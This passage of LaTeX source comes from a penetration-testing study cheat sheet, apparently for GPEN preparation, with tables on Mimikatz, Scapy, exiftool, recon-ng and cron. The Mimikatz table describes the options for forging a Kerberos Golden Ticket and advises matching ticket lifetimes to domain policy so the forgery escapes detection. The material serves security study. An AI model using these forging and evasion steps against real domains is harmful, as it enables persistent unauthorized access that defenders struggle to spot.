impersonate \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} `/groups` (optional) & group RIDs the user is a member of (the first is the primary group); default: 513,512,520,518,519 for the well-known administrative groups \tn % Row Count 10 (+ 6) % Row 5 \SetRowColor{white} `/ticket` (optional) & provide a path and name for saving the Golden Ticket file for later use, or use /ptt to immediately inject the golden ticket into memory for use.
\tn % Row Count 17 (+ 7) % Row 6 \SetRowColor{LightBackground} `/ptt` & as an alternative to /ticket -- use this to immediately inject the forged ticket into memory for use. \tn % Row Count 22 (+ 5) % Row 7 \SetRowColor{white} `/id` (optional) & user RID. Mimikatz default is 500 (the built-in Administrator account RID). \tn % Row Count 25 (+ 3) % Row 8 \SetRowColor{LightBackground} `/startoffset` (optional) & the start offset, in minutes, from which the ticket is valid (generally set to -10 or 0 if this option is used). Mimikatz default value is 0. \tn % Row Count 31 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Mimikatz (cont)}} \tn % Row 9 \SetRowColor{LightBackground} `/endin` (optional) & ticket lifetime in minutes. Mimikatz default value is 10 years (\textasciitilde{}5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). A lifetime that exceeds the domain policy is a well-known forged-ticket indicator, so set /endin and /renewmax to match the policy (e.g. /endin:600 /renewmax:10080). \tn % Row Count 7 (+ 7) % Row 10 \SetRowColor{white} `/renewmax` (optional) & maximum ticket lifetime with renewal, in minutes. Mimikatz default value is 10 years (\textasciitilde{}5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).
\tn % Row Count 15 (+ 8) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.36 cm} x{4.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Scapy (Packet crafting)}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{GPEN AIO Book - Lab 3-4: Scapy Introductory} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `scapy (as root)` & start the interactive shell (root is needed to send on raw sockets) \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \seqsplit{`help(function)`} & Get help for a specific function \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} `p = \seqsplit{IP()/TCP()/"Foo"`} & build a packet by stacking layers (IP / TCP / raw payload "Foo"); unset fields take their defaults \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} `ls(p)` & list the packet's fields and their current values \tn % Row Count 8 (+ 1) % Row 5 \SetRowColor{white} `p.show()` & pretty-print the packet layer by layer \tn % Row Count 9 (+ 1) % Row 6 \SetRowColor{LightBackground} `p.summary()` & one-line summary of the packet \tn % Row Count 10 (+ 1) % Row 7 \SetRowColor{white} `ls(p{[}Raw{]})` & view just the payload data \tn % Row Count 11 (+ 1) % Row 8 \SetRowColor{LightBackground} `p{[}IP{]}.src="ipaddress"` & set src address \tn % Row Count 13 (+ 2) % Row 9 \SetRowColor{white} `p{[}IP{]}.dst="ipaddress"` & set dst address \tn % Row Count 15 (+ 2) % Row 10 \SetRowColor{LightBackground} `p{[}TCP{]}.sport=xx` & set src port (an integer, not a quoted string) \tn % Row Count 17 (+ 2) % Row 11 \SetRowColor{white} `p{[}TCP{]}.dport=xx` & set dst port (integer) \tn % Row Count 19 (+ 2) % Row 12 \SetRowColor{LightBackground} `p=IP/TCP/DATA` & packet structure (layers are composed with `/`) \tn % Row Count 20 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{AIO Book - Page 158} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metadata Analysis}} \tn % Row 0 \SetRowColor{LightBackground} `./exiftool
\seqsplit{t/images/ExifTool.jpg} \textgreater{}/root/exif.out & execute exiftool against ExifTool.jpg and save the extracted metadata to /root/exif.out \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} strings -n 8 file.txt & print printable strings at least eight characters long (default minimum is 4; a higher value cuts noise) \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Recon-ng commands for whois\_pocs}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`recon-ng`} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`marketplace install all ; exit` (installs every module; many need API keys, and only whois\_pocs is used below)} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`workspaces create demo`} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`modules load \seqsplit{recon/domains-contacts/whois\_pocs`}} \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`options set SOURCE example.com`} \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`run`} \tn % Row Count 6 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`show contacts`} \tn % Row Count 7 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.44 cm} x{4.56 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cron}} \tn % Row 0 \SetRowColor{LightBackground} `crontab -l` & list the current user's job entries (`-u user` for another user as root; system jobs live in /etc/crontab and /etc/cron.d) \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `crontab -e` & edit job entries \tn % Row Count 2 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}